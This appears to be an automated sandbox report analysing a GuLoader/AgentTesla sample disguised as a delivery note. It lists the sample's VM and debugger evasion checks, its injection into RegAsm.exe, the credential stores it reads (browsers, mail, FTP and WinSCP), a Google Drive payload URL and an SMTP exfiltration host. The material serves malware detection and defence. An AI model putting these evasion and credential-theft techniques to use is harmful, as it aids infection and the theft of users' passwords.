            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\Delivery note_241493.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exe, 0000001A.00000002.5613195333.0000000000EA0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1KFEDTVEJDXDEWXXKM0SF_SDS1MXR4DOV
            Source: Delivery note_241493.exe, 00000000.00000002.1001486270.0000000002C50000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5613195333.0000000000EA0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Delivery note_241493.exe, 00000000.00000002.1000194791.00000000007A4000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Delivery note_241493.exe, 00000000.00000002.1001486270.0000000002C50000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4032Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9943Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeSystem information queried: ModuleInformationJump to behavior
            Source: Delivery note_241493.exe, 00000000.00000002.1002888810.0000000004C89000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Delivery note_241493.exe, 00000000.00000002.1002888810.0000000004C89000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: Delivery note_241493.exe, 00000000.00000002.1002888810.0000000004C89000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Delivery note_241493.exe, 00000000.00000002.1002888810.0000000004C89000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Delivery note_241493.exe, 00000000.00000002.1002888810.0000000004C89000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: Delivery note_241493.exe, 00000000.00000002.1001486270.0000000002C50000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: RegAsm.exe, 0000001A.00000002.5614709541.000000000102E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 0000001A.00000002.5613195333.0000000000EA0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov
            Source: RegAsm.exe, 0000001A.00000002.5615895453.0000000001070000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWj
            Source: Delivery note_241493.exe, 00000000.00000002.1001486270.0000000002C50000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5613195333.0000000000EA0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Delivery note_241493.exe, 00000000.00000002.1002888810.0000000004C89000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Delivery note_241493.exe, 00000000.00000002.1002888810.0000000004C89000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Delivery note_241493.exe, 00000000.00000002.1002888810.0000000004C89000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: Delivery note_241493.exe, 00000000.00000002.1000194791.00000000007A4000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 0000001A.00000002.5623371409.0000000002A49000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\Delivery note_241493.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00936950 LdrInitializeThunk,26_2_00936950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Delivery note_241493.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C20000Jump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Delivery note_241493.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Delivery note_241493.exe' Jump to behavior
            Source: RegAsm.exe, 0000001A.00000002.5621609275.00000000015F0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 0000001A.00000002.5621609275.00000000015F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 0000001A.00000002.5621609275.00000000015F0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 0000001A.00000002.5621609275.00000000015F0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2672, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2672, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2672, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1645 Sample: Delivery note_241493.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 21 mail.csavarcsapagyexpress.hu 2->21 23 csavarcsapagyexpress.hu 2->23 25 6 other IPs or domains 2->25 33 Found malware configuration 2->33 35 Sigma detected: RegAsm connects to smtp port 2->35 37 Yara detected GuLoader 2->37 39 2 other signatures 2->39 8 Delivery note_241493.exe 1 2->8         started        signatures3 process4 signatures5 41 Writes to foreign memory regions 8->41 43 Tries to detect Any.run 8->43 45 Hides threads from debuggers 8->45 11 RegAsm.exe 9 8->11         started        15 RegAsm.exe 8->15         started        17 RegAsm.exe 8->17         started        process6 dnsIp7 27 csavarcsapagyexpress.hu 185.111.89.226, 49769, 587 WEBSUPPORT-SRO-SK-ASSK Hungary 11->27 29 googlehosted.l.googleusercontent.com 142.250.184.193, 443, 49756 GOOGLEUS United States 11->29 31 drive.google.com 172.217.168.46, 443, 49755 GOOGLEUS United States 11->31 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->47 49 Tries to steal Mail credentials (via file access) 11->49 51 Tries to harvest and steal ftp login credentials 11->51 57 3 other signatures 11->57 19 conhost.exe 11->19         started        53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->53 55 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->55 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Delivery note_241493.exe8%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            csavarcsapagyexpress.hu0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://Hpdghc.com0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://jRW95HZ6DAQuQZac.org0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            csavarcsapagyexpress.hu
            		185.111.89.226
            		truetrueunknown
            drive.google.com
            		172.217.168.46
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		142.250.184.193
              		truefalse
                		high
                edge-web.dual-gslb.spotify.com
                		35.186.224.25
                		truefalse
                  		high
                  spclient.wg.spotify.com
                  		unknown
                  		unknownfalse
                    		high
                    doc-04-9g-docs.googleusercontent.com
                    		unknown
                    		unknownfalse
                      		high
                      mail.csavarcsapagyexpress.hu
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://doc-04-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/p9irpuq1lj8ip6m4433g3knsldrdvp8d/1634135550000/12448148553778765603/*/1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov?e=downloadfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1RegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://Hpdghc.comRegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://doc-04-9g-docs.googleusercontent.com/qi;RegAsm.exe, 0000001A.00000002.5614964275.0000000001040000.00000004.00000020.sdmpfalse
                            		high
                            http://DynDns.comDynDNSRegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://sectigo.com/CPS0RegAsm.exe, 0000001A.00000002.5635743077.000000001DDE5000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://doc-04-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/p9irpuq1RegAsm.exe, 0000001A.00000003.972558924.0000000001081000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000003.977239633.0000000001084000.00000004.00000001.sdmpfalse
                              		high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://drive.google.com/RegAsm.exe, 0000001A.00000002.5613874054.0000000000FF8000.00000004.00000020.sdmpfalse
                                		high
                                https://doc-04-9g-docs.googleusercontent.com/tographyRegAsm.exe, 0000001A.00000003.972558924.0000000001081000.00000004.00000001.sdmpfalse
                                  		high
                                  https://jRW95HZ6DAQuQZac.orgRegAsm.exe, 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmp, RegAsm.exe, 0000001A.00000003.1894514695.0000000000ED1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://doc-04-9g-docs.googleusercontent.com/5RegAsm.exe, 0000001A.00000003.977239633.0000000001084000.00000004.00000001.sdmpfalse
                                    		high
                                    https://doc-04-9g-docs.googleusercontent.com/ij7RegAsm.exe, 0000001A.00000002.5614964275.0000000001040000.00000004.00000020.sdmpfalse
                                      		high
                                      https://doc-04-9g-docs.googleusercontent.com/RegAsm.exe, 0000001A.00000003.972558924.0000000001081000.00000004.00000001.sdmpfalse
                                        		high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        172.217.168.46
                                        		drive.google.comUnited States
                                        		15169GOOGLEUSfalse
                                        185.111.89.226
                                        		csavarcsapagyexpress.huHungary
                                        		51013WEBSUPPORT-SRO-SK-ASSKtrue
                                        142.250.184.193
                                        		googlehosted.l.googleusercontent.comUnited States
                                        		15169GOOGLEUSfalse

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:1645
                                        Start date:13.10.2021
                                        Start time:16:29:35
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 51s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:Delivery note_241493.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                        Run name:Suspected Instruction Hammering
                                        Number of analysed new started processes analysed:42
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.spre.troj.spyw.evad.winEXE@8/1@4/3
                                        EGA Information:Failed
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 58
                                        • Number of non-executed functions: 9
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, IntelPTTEKRecertification.exe, BackgroundTransferHost.exe, HxTsr.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 20.82.19.171, 40.117.96.136, 131.253.33.200, 13.107.22.200, 13.107.5.88, 20.50.102.62, 40.112.88.60, 20.199.120.151, 92.123.195.35, 92.123.195.73, 52.109.12.19, 20.54.89.15, 52.152.108.96, 52.242.97.97, 20.54.89.106, 209.197.3.8, 2.21.140.114, 20.82.209.183, 20.73.194.208, 20.190.159.134, 40.126.31.143, 40.126.31.141, 40.126.31.8, 20.190.159.138, 20.190.159.136, 40.126.31.1, 40.126.31.137
